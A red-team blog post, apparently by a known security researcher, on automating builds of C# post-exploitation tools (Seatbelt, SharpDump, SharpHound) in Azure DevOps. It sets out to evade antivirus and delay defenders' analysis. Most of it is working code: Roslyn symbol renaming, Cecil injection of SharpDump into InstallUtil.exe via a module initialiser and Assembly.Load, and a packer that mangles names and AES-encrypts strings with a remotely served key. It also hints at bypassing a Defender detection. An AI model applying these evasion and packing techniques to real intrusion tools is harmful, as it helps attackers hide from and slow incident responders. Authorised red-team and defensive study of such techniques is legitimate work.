Building, Modifying, and Packing with Azure DevOps

Over the last few months I’ve been using the Azure DevOps platform as a way of building the many C# post-exploitation tools coming out of the Red Teaming space:

This is your monthly reminder that with offensive security, DevOps is your friend pic.twitter.com/5AvlzuTQK9

— Adam Chester (@xpn) February 5, 2019

After I mentioned this a few times, a number of people contacted me wanting to know how they could set up a similar environment for themselves. While I was happy to show the basics of Azure DevOps and how to automate the building of tools, one of my main reasons for moving to automated builds was to also automate the modification of common indicators such as a project's class names, namespaces and method names: all the things we usually spend time changing in Visual Studio before using a tool.

In this post I’m going to show how to build an Azure DevOps pipeline for .NET projects, and share some techniques I have found useful for modifying build artifacts so that they differ from the public builds and, in some cases, take longer to analyse if they are detected by the Blue Team.

Note: The examples shown in this post should not be lifted straight into a build pipeline, as they were created to demonstrate concepts rather than to be AV/EDR safe.

Azure DevOps

If you haven’t come across Azure DevOps, this platform was made available by Microsoft in late 2018 as an evolution of VSTS, supporting developers who are adopting the CI/CD methodology. While hunting for a way to automate the building of the numerous .NET post-exploitation tools, I found that Azure DevOps stood out as a platform where I could build Visual Studio projects for a low cost (or in most cases, for free). Other platforms are available for creating a similar build environment, such as Travis CI, which offers .NET compilation support via Mono; however, I quickly found that when attempting to compile tools which rely on some Microsoft namespaces, the build failed due to missing support.

To get started with Azure DevOps, you first need an account which can be registered at https://dev.azure.com. When an account has been created, a project can be used to group your builds:

The way that I like to manage tools is by creating a fork on GitHub. This ensures that I know exactly what is contained within each build, and avoids pulling in upstream changes which may break things like Cobalt Strike aggressor scripts.



To work with a GitHub fork, you’ll need to authorise GitHub for use with Azure DevOps via the usual OAuth dance:



With GitHub authorised, we are then free to select which of the forked tools we want to build. In this example I’ll use the GhostPack Seatbelt tool:





When building common .NET tools, the “.NET Desktop” template serves as a good starting point for our pipeline. When selected, you can start to customise each build step, which by default looks like this:

As we won’t be running any unit tests for this build, we can remove the “VsTest” step. The other step worth customising is “Publish Artifact”, which exposes options around how the compiled solution will be made available. For this post we are just going to download the artifact from within Azure DevOps, but by using different build tasks you have numerous options for retrieving your build artifacts, such as having them uploaded to you over SSH or pushed into Azure Blob storage:



Once configured, save and queue your pipeline, which will start a new build of the solution. After a few minutes we will hopefully be greeted with a successful build:



Viewing the completed build, we can then download the compiled application via the artifacts menu:

And there we have our first Azure DevOps build. Now while this is great for automation, we still have the issue of our pipeline creating the same artifacts as every other build out there. Normally we would take steps to change the default tool structure, such as renaming namespaces or classes, but how can we do this when automating our builds?

Modifying Your Build

Typically when compiling tools like this, we want to switch up the code, or at the very least, the namespaces and class names used throughout. When I started automating builds, I actually used a very crude PowerShell script which would simply find/replace terms throughout the source. The issue with this kind of technique, however, is that a broad replace across a .cs file will often leave it with syntax errors. For example, let’s take the following code:

```csharp
namespace MaliciousTool {
    public class Users {
        public static void List() {
            var users = new List<string>();
            ...
        }
    }
}
```

If we wanted to rename the List method, we would likely just search for occurrences of List and replace them with something else, but doing so would result in this code:

```csharp
namespace MaliciousTool {
    public class Users {
        public static void RandomName() {
            var users = new RandomName<string>();
            ...
        }
    }
}
```

This of course will generate a compiler error, and our build will fail. So what other options do we have? Well, we could patch the code manually, or create scripts which work for a specific tool, but one of the aims of this kind of automation is to be able to merge in changes from upstream without having to fiddle around getting them to work. So how can we create something a bit more durable?
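A tempting middle ground is a smarter text substitution that only matches whole words. As a minimal sketch of why that still fails (written in C for brevity; replace_whole_word is a hypothetical helper that only understands ASCII identifiers), note that List inside List<string> is itself a whole word, so the generic type is renamed along with the method:

```c
#include <assert.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* True if c may appear inside a C# identifier (ASCII subset only). */
static int is_ident_char(char c)
{
    return isalnum((unsigned char)c) || c == '_';
}

/*
 * Hypothetical helper: replace every whole-word occurrence of `from` with `to`.
 * A match must not be preceded or followed by an identifier character, so
 * "ListUsers" and "MyList" are left alone. The caller frees the result.
 */
char *replace_whole_word(const char *src, const char *from, const char *to)
{
    size_t src_len = strlen(src), from_len = strlen(from), to_len = strlen(to);
    /* Each match consumes from_len >= 1 input chars and emits to_len output
       chars; every other char is copied as-is, so this bound is safe. */
    char *out = malloc(src_len * (to_len > 1 ? to_len : 1) + 1);
    char *w = out;
    const char *r = src;

    assert(from_len > 0);
    if (out == NULL)
        return NULL;

    while (*r != '\0') {
        int match = strncmp(r, from, from_len) == 0 &&
                    (r == src || !is_ident_char(r[-1])) &&
                    !is_ident_char(r[from_len]);
        if (match) {
            memcpy(w, to, to_len);
            w += to_len;
            r += from_len;
        } else {
            *w++ = *r++;
        }
    }
    *w = '\0';
    return out;
}
```

Run over the method from the example above, it turns void List() into void RandomName() but still produces new RandomName<string>. Telling the two apart requires knowing what each token means in the program's syntax, not just its text.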

Well, in 2015 Microsoft released Roslyn, a compiler and supporting toolset providing an array of functionality: from the expected task of compiling applications, to supporting the creation of Visual Studio extensions that find and fix code issues, and even parsing C#/VB into syntax trees which can be traversed and modified. This obviously lends itself to our task perfectly.

To begin, let’s target our Seatbelt build and attempt to replace class names with randomly generated strings. First we need to add the required libraries to our project. Via NuGet, we can add Microsoft.CodeAnalysis.CSharp and Microsoft.CodeAnalysis.Workspaces.MSBuild, which allow us to analyse C# solutions (C# appears to be the language used by most .NET post-exploitation tooling at the moment).

With libraries added, we start by creating a workspace:

```csharp
// Newer versions of Microsoft.CodeAnalysis.Workspaces.MSBuild typically also need
// MSBuildLocator.RegisterDefaults() (Microsoft.Build.Locator package) to be called first
var m_workspace = MSBuildWorkspace.Create();
```

With the workspace created, we can load the target Visual Studio solution we will be working with:

```csharp
Solution solution = await m_workspace.OpenSolutionAsync(@"seatbelt.sln");
```

Within our chosen Visual Studio solution are projects, and within each project are multiple source files (or documents in Roslyn terminology). So what we want to do is traverse each project and each document, identifying the keywords we are looking to modify. This can be done with the following:

// Find all projects in the solution

var projects = solution.Projects;

// Let's get the first project

var project = projects.FirstOrDefault();

// Enumerate through documents in the project

foreach (var document in project.Documents)

{

// Work on document here



} With each document structure available to us, we need to find a way to retrieve information on the source code contained within. Roslyn will help here by building a Syntax Tree which can be navigated to select areas we are interested in modifying. As the Syntax Tree created can be quite complex in structure, Microsoft created the Syntax Visualizer extension to provide a visual representation from within Visual Studio, which is useful in identifying the correct types to hunt for:

In our case we are looking to enumerate classes, and as shown above, this is referenced via a ClassDeclarationSyntax type, meaning we can use:

```csharp
var syntaxTree = await document.GetSyntaxTreeAsync();
var classes = syntaxTree.GetRoot().DescendantNodes().OfType<ClassDeclarationSyntax>();
```

Now that we have a way to enumerate each class in a document, we need a way to rename it. One way to do this is with the [Renamer.RenameSymbolAsync](https://docs.microsoft.com/en-us/dotnet/api/microsoft.codeanalysis.rename.renamer.renamesymbolasync?view=roslyn-dotnet) method, which renames a symbol throughout a solution. This is pretty awesome to see in action, as Roslyn will traverse each document within the solution and replace every reference it finds with the provided name (think Visual Studio refactoring, but callable from code).

To use this method, we need to reference a symbol identifying our class. A symbol in Roslyn terms is essentially an identifier for an element of code, whether that is a class, a namespace, or a method. To reference a symbol, we need to switch from the current Syntax Tree model to the “Semantic Model”, which we can generate using:

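```csharp
var semanticModel = await document.GetSemanticModelAsync();
```

We can then translate a node from the Syntax Tree to a symbol using:

```csharp
// node is one of the ClassDeclarationSyntax entries enumerated above
var symbol = semanticModel.GetDeclaredSymbol(node);
```

And with our symbol retrieved, we can pass it to the renamer method with:

```csharp
solution = await Renamer.RenameSymbolAsync(solution, symbol, "newnameforclass", solution.Workspace.Options);
```

Keep in mind that RenameSymbolAsync returns a new, immutable Solution rather than editing files in place: documents and semantic models retrieved before the call still refer to the old snapshot, and nothing is written to disk until the changes are applied back to the workspace, for example with m_workspace.TryApplyChanges(solution).

An example of how this looks in practice when renaming classes, namespaces and enums can be found here.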



With our Roslyn based obfuscator created, let’s add it to our build pipeline to modify the project’s source code before it is compiled. There are a number of ways we can add our obfuscator into the pipeline, for example by downloading it from a GitHub release or from Azure Blob storage. As I’m also building my obfuscator projects within Azure DevOps, I use the “Download Build Artifacts” task, which allows you to take artifacts from another compiled project and transfer them into the current pipeline. Once the artifacts have been added, I use the “Inline Powershell” task to invoke the renamer:



With the obfuscator added, we now have a very quick way of compiling the latest builds of a .NET tool with obfuscated type names:



But what about that ugly assembly name? Well that is actually easy to change within our pipeline, by adding options to the “Build Solution” task:



Which gives us a nice renamed assembly:

Injecting your Build

Another way that we can look to obfuscate our code during the build process is by injecting our compiled .NET tool into a surrogate application. For example, if we can embed our tool within a legitimate .NET application, we may have the ability to hide in plain sight, and hopefully delay analysis by the investigating team.

To help us with this, we can use Jb Evain’s awesome Cecil project, which gives us the power to read, modify and write compiled assemblies. The idea is simple: we embed our compiled tool as a resource within a surrogate application, and then launch it when the surrogate application is executed.

To get started with Cecil, you will need to grab the libraries. Again the easiest way is to use the NuGet package Mono.Cecil:

With the library added, we start by adding our tool as a resource within a chosen surrogate application. For this example we will be attempting to obfuscate the GhostPack SharpDump tool:

```csharp
// Namespaces used by the Cecil snippets in this section
using System.IO;
using System.Linq;
using Mono.Cecil;
using Mono.Cecil.Cil;

// Load the surrogate and embed our compiled tool as a public resource named "embedded"
var cecilAssembly = Mono.Cecil.AssemblyDefinition.ReadAssembly("surrogate.exe");
EmbeddedResource r = new EmbeddedResource("embedded", ManifestResourceAttributes.Public, File.ReadAllBytes("sharpdump.exe"));
cecilAssembly.MainModule.Resources.Add(r);
```

With a new resource injected, we need a way to redirect execution. As we want our code to run on startup, we can add a module initialiser to the assembly. If you haven’t come across a .NET module initialiser, this is a method which, if present within an assembly, will be executed before the Main method (or when the assembly is loaded, if used as a library). If you have ever used Costura Fody, this is basically how the merging of assemblies is performed.

To add a new module initialiser, we can use the following calls to Cecil:

```csharp
// Get a reference to the current "<Module>" class
var moduleType = cecilAssembly.MainModule.Types.FirstOrDefault(x => x.Name == "<Module>");

// Check for any existing constructor / module initialiser
var method = moduleType.Methods.FirstOrDefault(x => x.Name == ".cctor");
if (method == null)
{
    // No module initialiser so we need to create one
    method = new MethodDefinition(".cctor",
        MethodAttributes.Private |
        MethodAttributes.HideBySig |
        MethodAttributes.Static |
        MethodAttributes.SpecialName |
        MethodAttributes.RTSpecialName,
        cecilAssembly.MainModule.TypeSystem.Void
    );
    moduleType.Methods.Add(method);
}
```

With the initialiser created, we can then add the code to be executed. In our case, we will read our injected resource and pass it over to Assembly.Load. As we are dealing with compiled assemblies, we will need to write this code in Intermediate Language (IL). For example, if we take a very simple method of:

```csharp
// Get a stream to our injected resource
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream("embedded");

// Read the injected resource bytes
byte[] array = new byte[manifestResourceStream.Length];
manifestResourceStream.Read(array, 0, (int)manifestResourceStream.Length);

// Remove the initial application element from the commandline
// (argsOnly is one slot shorter than commandline, matching the IL below)
string[] commandline = Environment.GetCommandLineArgs();
string[] argsOnly = new string[commandline.Length - 1];
Array.Copy(commandline, 1, argsOnly, 0, commandline.Length - 1);

// Pass execution to our injected assembly along with arguments
Assembly assembly = Assembly.Load(array);
assembly.EntryPoint.Invoke(null, new object[] { argsOnly });
```

This will translate to Cecil calls of:

```csharp
// Get a Cecil IL Processor for working with this method body
var ilProc = method.Body.GetILProcessor();

// Clear and add our own local variables:
// 0 = Stream, 1 = byte[], 2 = Assembly, 3 = string[] commandline, 4 = string[] argsOnly
ilProc.Body.Variables.Clear();
ilProc.Body.Variables.Add(new VariableDefinition(method.Module.Import(typeof(System.IO.Stream))));
ilProc.Body.Variables.Add(new VariableDefinition(method.Module.Import(typeof(byte[]))));
ilProc.Body.Variables.Add(new VariableDefinition(method.Module.Import(typeof(System.Reflection.Assembly))));
ilProc.Body.Variables.Add(new VariableDefinition(method.Module.Import(typeof(string[]))));
ilProc.Body.Variables.Add(new VariableDefinition(method.Module.Import(typeof(string[]))));

// Clear instructions as we will be taking over execution
ilProc.Body.Instructions.Clear();

// Add our IL to load an assembly from a resource and pass execution (and arguments) to the entrypoint

// stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("embedded")
ilProc.Append(ilProc.Create(OpCodes.Call, method.Module.Import(typeof(System.Reflection.Assembly).GetMethod("GetExecutingAssembly"))));
ilProc.Append(ilProc.Create(OpCodes.Ldstr, "embedded"));
ilProc.Append(ilProc.Create(OpCodes.Callvirt, method.Module.Import(typeof(System.Reflection.Assembly).GetMethod("GetManifestResourceStream", new[] { typeof(string) }))));
ilProc.Append(ilProc.Create(OpCodes.Stloc_0));

// array = new byte[stream.Length]
ilProc.Append(ilProc.Create(OpCodes.Ldloc_0));
ilProc.Append(ilProc.Create(OpCodes.Callvirt, method.Module.Import(typeof(System.IO.Stream).GetMethod("get_Length"))));
ilProc.Append(ilProc.Create(OpCodes.Conv_Ovf_I));
ilProc.Append(ilProc.Create(OpCodes.Newarr, method.Module.Import(typeof(Byte))));
ilProc.Append(ilProc.Create(OpCodes.Stloc_1));

// stream.Read(array, 0, (int)stream.Length), discarding the return value
ilProc.Append(ilProc.Create(OpCodes.Ldloc_0));
ilProc.Append(ilProc.Create(OpCodes.Ldloc_1));
ilProc.Append(ilProc.Create(OpCodes.Ldc_I4_0));
ilProc.Append(ilProc.Create(OpCodes.Ldloc_0));
ilProc.Append(ilProc.Create(OpCodes.Callvirt, method.Module.Import(typeof(System.IO.Stream).GetMethod("get_Length"))));
ilProc.Append(ilProc.Create(OpCodes.Conv_I4));
ilProc.Append(ilProc.Create(OpCodes.Callvirt, method.Module.Import(typeof(System.IO.Stream).GetMethod("Read", new[] { typeof(byte[]), typeof(Int32), typeof(Int32) }))));
ilProc.Append(ilProc.Create(OpCodes.Pop));

// assembly = Assembly.Load(array)
ilProc.Append(ilProc.Create(OpCodes.Ldloc_1));
ilProc.Append(ilProc.Create(OpCodes.Call, method.Module.Import(typeof(System.Reflection.Assembly).GetMethod("Load", new[] { typeof(byte[]) }))));
ilProc.Append(ilProc.Create(OpCodes.Stloc_2));

// Push assembly.EntryPoint, null (the target) and a new object[1], ready to fill slot 0
ilProc.Append(ilProc.Create(OpCodes.Ldloc_2));
ilProc.Append(ilProc.Create(OpCodes.Callvirt, method.Module.Import(typeof(System.Reflection.Assembly).GetMethod("get_EntryPoint"))));
ilProc.Append(ilProc.Create(OpCodes.Ldnull));
ilProc.Append(ilProc.Create(OpCodes.Ldc_I4_1));
ilProc.Append(ilProc.Create(OpCodes.Newarr, method.Module.Import(typeof(System.Object))));
ilProc.Append(ilProc.Create(OpCodes.Dup));
ilProc.Append(ilProc.Create(OpCodes.Ldc_I4_0));

// commandline = Environment.GetCommandLineArgs(); argsOnly = new string[commandline.Length - 1]
ilProc.Append(ilProc.Create(OpCodes.Call, method.Module.Import(typeof(System.Environment).GetMethod("GetCommandLineArgs"))));
ilProc.Append(ilProc.Create(OpCodes.Stloc_3));
ilProc.Append(ilProc.Create(OpCodes.Ldloc_3));
ilProc.Append(ilProc.Create(OpCodes.Ldlen));
ilProc.Append(ilProc.Create(OpCodes.Conv_I4));
ilProc.Append(ilProc.Create(OpCodes.Ldc_I4_1));
ilProc.Append(ilProc.Create(OpCodes.Sub));
ilProc.Append(ilProc.Create(OpCodes.Newarr, method.Module.Import(typeof(System.String))));
ilProc.Append(ilProc.Create(OpCodes.Stloc, ilProc.Body.Variables[4]));

// Array.Copy(Environment.GetCommandLineArgs(), 1, argsOnly, 0, commandline.Length - 1)
ilProc.Append(ilProc.Create(OpCodes.Call, method.Module.Import(typeof(System.Environment).GetMethod("GetCommandLineArgs"))));
ilProc.Append(ilProc.Create(OpCodes.Ldc_I4_1));
ilProc.Append(ilProc.Create(OpCodes.Ldloc, ilProc.Body.Variables[4]));
ilProc.Append(ilProc.Create(OpCodes.Ldc_I4_0));
ilProc.Append(ilProc.Create(OpCodes.Ldloc_3));
ilProc.Append(ilProc.Create(OpCodes.Ldlen));
ilProc.Append(ilProc.Create(OpCodes.Conv_I4));
ilProc.Append(ilProc.Create(OpCodes.Ldc_I4_1));
ilProc.Append(ilProc.Create(OpCodes.Sub));
ilProc.Append(ilProc.Create(OpCodes.Call, method.Module.Import(typeof(System.Array).GetMethod("Copy", new[] { typeof(System.Array), typeof(Int32), typeof(System.Array), typeof(Int32), typeof(Int32) }))));

// object[0] = argsOnly, then EntryPoint.Invoke(null, object[]) and discard the result
ilProc.Append(ilProc.Create(OpCodes.Ldloc, ilProc.Body.Variables[4]));
ilProc.Append(ilProc.Create(OpCodes.Stelem_Ref));
ilProc.Append(ilProc.Create(OpCodes.Callvirt, method.Module.Import(typeof(System.Reflection.MethodBase).GetMethod("Invoke", new[] { typeof(object), typeof(object[]) }))));
ilProc.Append(ilProc.Create(OpCodes.Pop));
ilProc.Append(ilProc.Create(OpCodes.Ret));
```

Once our IL has been added to our surrogate application, we then save our newly generated assembly with:





cecilAssembly.Write(@"output.exe");Throwing our newly crafted assembly into dnSpy, we see that our IL code has been added successfully:



Similar to our Roslyn based example above, we can add this obfuscator to our Azure DevOps build pipeline to transform a generated assembly. For this build, let’s attempt to inject our SharpDump build into the Windows “InstallUtil.exe” binary. As this works on a compiled assembly, we will need to run our obfuscator after the compilation step:

And when we download our built artifact and attempt to execute it:

The code for this example can be found here.

Note: Microsoft Windows Defender now appears to identify the pulling of resources into the Assembly.Load method as malicious; however, a number of other AV/EDR solutions will wave this through without question, so be aware of your target environment before using this. If you do need to deploy this technique within a Defender protected environment, the detection workaround is actually pretty straightforward (hint: check out how Costura does it ;)

Let’s look at another technique we can use to protect our builds.

Packing your Build

Now that we have explored a few different methods of changing up our compiled tools, let’s have a bit of fun by creating a simple packer which will mangle our generated .NET assembly. Hopefully this will cause our investigators some delay when attempting to reverse our tools :)

Now of course there are many free and commercial packers out there for us to use; however, I’ve found that the awesome de4dot project supports most common variants, and is able to generate readable versions in a lot of cases. As this kind of negates what we are trying to achieve (namely delaying the investigation of our tools), knowing how to craft a quick throwaway packer can help throw a spanner in the works by forcing the investigating team to spend a bit longer analysing. And with frameworks like Cecil, we can be as crazy as we want to be.







To start, let’s take the SharpHound tool from BloodHound and change up those verbose method names with Cecil. This is as simple as scanning through the compiled .NET exe and replacing each method name with something random:

foreach(var type in assembly.MainModule.Types)

{

foreach(var method in type.Methods)

{

// Don't mess up inheritance / generic functions etc

if (!method.IsConstructor &&

!method.IsGenericInstance &&

!method.IsAbstract &&

!method.IsNative &&

!method.IsPInvokeImpl &&

!method.IsUnmanaged &&

!method.IsUnmanagedExport &&

!method.IsVirtual &&

method != assembly.MainModule.EntryPoint

)

{

method.Name = Utils.RandomString(10);

}

}

}



}Now if we view this in DnSpy, we will have something like this:

What about those class names? Similarly, we can mangle those alongside our methods with:

```csharp
foreach(var type in assembly.MainModule.Types)
{
    if (type.IsClass && !type.IsSpecialName)
    {
        type.Name = Utils.RandomString(10);
    }

    foreach(var method in type.Methods)
    {
        // Don't mess up inheritance / generic functions etc
        if (!method.IsConstructor &&
            !method.IsGenericInstance &&
            !method.IsAbstract &&
            !method.IsNative &&
            !method.IsPInvokeImpl &&
            !method.IsUnmanaged &&
            !method.IsUnmanagedExport &&
            !method.IsVirtual &&
            method != assembly.MainModule.EntryPoint
        )
        {
            method.Name = Utils.RandomString(10);
        }
    }
}
```


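Both loops lean on a Utils.RandomString helper that isn't shown here. As a rough sketch of what such a helper needs to do (random_identifier below is hypothetical, written in C, and uses rand(), which is fine for throwaway names but not for anything security-relevant), the main constraint is that the first character is a letter so the result remains a legal identifier:

```c
#include <assert.h>
#include <stdlib.h>

/*
 * Hypothetical stand-in for Utils.RandomString: writes `len` random
 * characters plus a NUL terminator into `out` (which must hold len + 1
 * bytes). The first character is always a letter and the rest are letters
 * or digits, so the result is also a valid C# identifier.
 */
void random_identifier(char *out, size_t len)
{
    static const char alnum[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    const size_t letters = 52;              /* the first 52 entries are letters */
    const size_t total = sizeof alnum - 1;  /* 62, excluding the NUL */
    size_t i;

    assert(out != NULL && len > 0);
    out[0] = alnum[(size_t)rand() % letters];
    for (i = 1; i < len; i++)
        out[i] = alnum[(size_t)rand() % total];
    out[len] = '\0';
}
```

With 10 characters drawn from 62 symbols, a collision between two generated names is very unlikely, but a more careful version would still track the names it has already issued, since two types landing on the same name in the same namespace could break the output.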

So with our method names and class names mangled, what about those ugly namespaces? Well, replacing a namespace isn’t quite as easy as renaming methods, as this remark from MSDN makes clear:

This doesn’t mean however that it isn’t possible. The easiest way I’ve found is by building up a list of existing namespaces and creating a translation dictionary which we can use to replace each reference, which looks like this:

Dictionary<string,string> namespaces = new Dictionary<string,string>();

// Create a namespace translation dict

foreach(var module in assembly.Modules)

{

foreach (var type in module.Types)

{

if (!namespaces.ContainsKey(type.Namespace)) {

// Create a new random entry in the translation dict for this namespace

namespaces[type.Namespace] = Utils.RandomString(10);

}

}

}

// Responsible for replacing method names, class names and translating namespaces

foreach(var type in assembly.MainModule.Types)

{

if (type.IsClass && !type.IsSpecialName)

{

type.Name = Utils.RandomString(10);

}

if (type.Namespace != "")

{

// Replace namespace via translation dict

if (namespaces.ContainsKey(type.Namespace))

{

type.Namespace = namespaces[type.Namespace];

}

}

...



}When executed, we will then have something that disassembles like this:




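The translation dictionary is what keeps the namespace rewrite consistent: every type that shared a namespace before the rewrite still shares one afterwards, and the global (empty) namespace is left untouched. A minimal C sketch of the same lookup-or-create logic follows; the fixed-size table, the helper name and the deterministic ns0, ns1, ... replacement names are assumptions made to keep it short and testable, where the post uses random strings.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

#define MAX_NAMESPACES 64
#define NAME_LEN 64

/* Translation table: from[i] is an original namespace, to[i] its replacement. */
struct ns_map {
    size_t count;
    char from[MAX_NAMESPACES][NAME_LEN];
    char to[MAX_NAMESPACES][NAME_LEN];
};

/*
 * Return the replacement for namespace `ns`, creating one the first time it
 * is seen. The empty (global) namespace is returned unchanged, mirroring the
 * type.Namespace != "" check in the Cecil loop.
 */
const char *translate_namespace(struct ns_map *map, const char *ns)
{
    size_t i;

    if (ns[0] == '\0')
        return ns;
    for (i = 0; i < map->count; i++)
        if (strcmp(map->from[i], ns) == 0)
            return map->to[i];

    assert(map->count < MAX_NAMESPACES && strlen(ns) < NAME_LEN);
    strcpy(map->from[map->count], ns);
    /* Deterministic names keep the sketch testable; the post uses random strings. */
    snprintf(map->to[map->count], NAME_LEN, "ns%zu", map->count);
    return map->to[map->count++];
}
```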

With the type names taken care of, let’s take a look at the body of the original methods:

With the strings being a bit of a giveaway, can we obfuscate them in any way? Well, we know that a string is loaded via the IL instruction ldstr, so we can hunt for any ldstr instruction within the enumerated method bodies:

```csharp
if (method.HasBody)
{
    var ilProc = method.Body.GetILProcessor();
    for (var l = 0; l < ilProc.Body.Instructions.Count(); l++)
    {
        if (ilProc.Body.Instructions[l].OpCode == Mono.Cecil.Cil.OpCodes.Ldstr && (string)ilProc.Body.Instructions[l].Operand != "")
        {
            ...
        }
    }
}
```

Now that we have a way to identify strings, how about encrypting them? And as this is a POC, why not encrypt them using a key delivered by an HTTP server, so that anyone snooping on our binary can’t simply recover them? To do this we will start by retrieving the ldstr operand, which is the string being referenced. Taking this string value, we can then encrypt it using AES.

One of the issues we will need to contend with is replacing an instruction with something of a different length. For example, if we replace an instruction with a longer one, branch instructions within the method will likely break, as the offsets they encode will no longer point at the right place.
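To make the offset problem concrete: a CIL branch operand is relative to the first byte after the branch instruction, and the short form br.s (opcode 0x2B) only has a signed single-byte operand, while br (0x38) has four bytes. The C sketch below (the helper names are hypothetical) computes that delta and checks whether it still fits the short form. Growing an instruction that sits between a branch and its target shifts the target, so the encoded delta has to change and may no longer fit at all. Note that Cecil stores branch targets as Instruction references and recomputes the offsets when writing, so when working through Cecil the main risk is a short-form branch whose new distance no longer fits in one byte.

```c
#include <assert.h>
#include <stdint.h>

#define BR_S_SIZE 2 /* br.s: opcode 0x2B + signed 1-byte operand */
#define BR_SIZE   5 /* br:   opcode 0x38 + signed 4-byte operand */

/* Branch operands are measured from the first byte after the branch instruction. */
int32_t branch_delta(uint32_t branch_at, uint32_t branch_size, uint32_t target_at)
{
    return (int32_t)target_at - (int32_t)(branch_at + branch_size);
}

/* Nonzero if `delta` still fits the 1-byte operand of a short-form branch. */
int fits_short_branch(int32_t delta)
{
    return delta >= INT8_MIN && delta <= INT8_MAX;
}
```

For example, a br.s at offset 0 aimed at offset 12 encodes a delta of 10; if an instruction between them grows by 120 bytes, the target moves to 132 and the required delta of 130 no longer fits in the short form.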

If we look at a typical ldstr instruction, we see that it actually consists of 5 bytes, as the string operand is a 4-byte token referencing the #US (user strings) heap rather than the string itself:

This means that we can replace an ldstr with something like a call instruction, which also consists of 5 bytes:
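Spelling out the byte layout shows why the swap is length-neutral. The C sketch below (encode_token_instr and the token values are hypothetical) encodes both instructions as a one-byte opcode, 0x72 for ldstr and 0x28 for call, followed by a 4-byte little-endian metadata token. For ldstr the token's top byte is 0x70 and the low 24 bits are an offset into the #US heap; for call the token names a method, for example a MethodDef (0x06) or MemberRef (0x0A) row.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define CEE_CALL  0x28 /* call <method token> */
#define CEE_LDSTR 0x72 /* ldstr <user string token> */

/*
 * Hypothetical helper: encode a one-byte opcode followed by its 4-byte
 * little-endian metadata token into `out` (at least 5 bytes). Returns the
 * number of bytes written.
 */
size_t encode_token_instr(uint8_t *out, uint8_t opcode, uint32_t token)
{
    assert(out != NULL);
    out[0] = opcode;
    out[1] = (uint8_t)(token & 0xFF);
    out[2] = (uint8_t)((token >> 8) & 0xFF);
    out[3] = (uint8_t)((token >> 16) & 0xFF);
    out[4] = (uint8_t)((token >> 24) & 0xFF);
    return 5;
}
```

Encoding ldstr with a hypothetical user-string token 0x70000001 and call with a hypothetical MethodDef token 0x06000042 both yield five bytes, so every instruction after the replacement keeps its offset.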

In practice, this looks like this:

```csharp
// IDENTIFIER, IV, strings, stringsMethod and module are set up elsewhere in the full obfuscator
if (method.HasBody)
{
    // Replace any LDSTR references with our string decryption call
    var ilProc = method.Body.GetILProcessor();
    for (var l = 0; l < ilProc.Body.Instructions.Count(); l++)
    {
        if (ilProc.Body.Instructions[l].OpCode == Mono.Cecil.Cil.OpCodes.Ldstr && (string)ilProc.Body.Instructions[l].Operand != "")
        {
            // AES encrypt the referenced string with our key
            var encrypted = Utils.EncryptStringToBytes_Aes((string)ilProc.Body.Instructions[l].Operand, Utils.CreateKey("SecretKey"), IV);

            // Blob layout: IV, then an 8-byte 0xDEADBEEF marker, then the ciphertext
            List<byte> c = new List<byte>();
            c.AddRange(IV);
            c.AddRange(new byte[] { 0xDE, 0xAD, 0xBE, 0xEF, 0xDE, 0xAD, 0xBE, 0xEF });
            c.AddRange(encrypted);

            // Add the encrypted string to be returned by our decrypting function
            strings.Add(Convert.ToBase64String(c.ToArray()));

            // Create a new type holding a small wrapper method; calling the wrapper
            // (rather than <Module>.Strings directly) keeps the instruction len at 5 bytes
            var tempType = new TypeDefinition(IDENTIFIER + Utils.RandomString(7),
                Utils.RandomString(7),
                TypeAttributes.Class |
                TypeAttributes.Public |
                TypeAttributes.BeforeFieldInit,
                module.TypeSystem.Object
            );

            var stringTempMethod = new MethodDefinition(IDENTIFIER + Utils.RandomString(7),
                MethodAttributes.Static |
                MethodAttributes.Public,
                module.TypeSystem.String
            );
            tempType.Methods.Add(stringTempMethod);

            // Add the new type (and its wrapper method) to the module
            module.Types.Add(tempType);

            // Wrapper body: push this string's index, call the <Module>.Strings method, return the decrypted string
            stringTempMethod.Body.Instructions.Add(Instruction.Create(OpCodes.Ldc_I4, strings.Count - 1));
            stringTempMethod.Body.Instructions.Add(Instruction.Create(OpCodes.Call, stringsMethod));
            stringTempMethod.Body.Instructions.Add(Instruction.Create(OpCodes.Ret));

            // Replace the LDSTR instruction with a call to our wrapper
            ilProc.Replace(ilProc.Body.Instructions[l], Instruction.Create(OpCodes.Call, stringTempMethod));
        }
    }
}
```

The code for the above can be found here along with the IL for the decryption routine.
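Each encrypted string is therefore stored as the IV, an 8-byte 0xDEADBEEF marker and the AES ciphertext, Base64 encoded. The C sketch below illustrates only that framing: it assumes a 16-byte IV (the AES block size; the size of IV isn't shown above), leaves out the AES and Base64 steps entirely, and uses hypothetical pack_blob/unpack_blob names. The unpacking side shows what a decryption routine has to do before it can decrypt anything: check the marker and split out the IV and ciphertext.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IV_LEN 16     /* assumption: a 16-byte IV, the AES block size */
#define MARKER_LEN 8

static const uint8_t MARKER[MARKER_LEN] = { 0xDE, 0xAD, 0xBE, 0xEF, 0xDE, 0xAD, 0xBE, 0xEF };

/* Frame one encrypted string as IV || marker || ciphertext; returns bytes written. */
size_t pack_blob(uint8_t *out, const uint8_t iv[IV_LEN], const uint8_t *ct, size_t ct_len)
{
    assert(out != NULL && iv != NULL);
    memcpy(out, iv, IV_LEN);
    memcpy(out + IV_LEN, MARKER, MARKER_LEN);
    memcpy(out + IV_LEN + MARKER_LEN, ct, ct_len);
    return IV_LEN + MARKER_LEN + ct_len;
}

/*
 * Reverse of pack_blob: check the marker, then point *iv and *ct into the
 * blob without copying. Returns 0 on success, -1 if the blob is malformed.
 */
int unpack_blob(const uint8_t *blob, size_t len, const uint8_t **iv,
                const uint8_t **ct, size_t *ct_len)
{
    if (len < IV_LEN + MARKER_LEN ||
        memcmp(blob + IV_LEN, MARKER, MARKER_LEN) != 0)
        return -1;
    *iv = blob;
    *ct = blob + IV_LEN + MARKER_LEN;
    *ct_len = len - IV_LEN - MARKER_LEN;
    return 0;
}
```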



When we go ahead and add this into our build pipeline and grab the resulting artifact, we can see that methods which used to look like this:

Now look like this:

But when executed, we see that everything works just as it originally did:

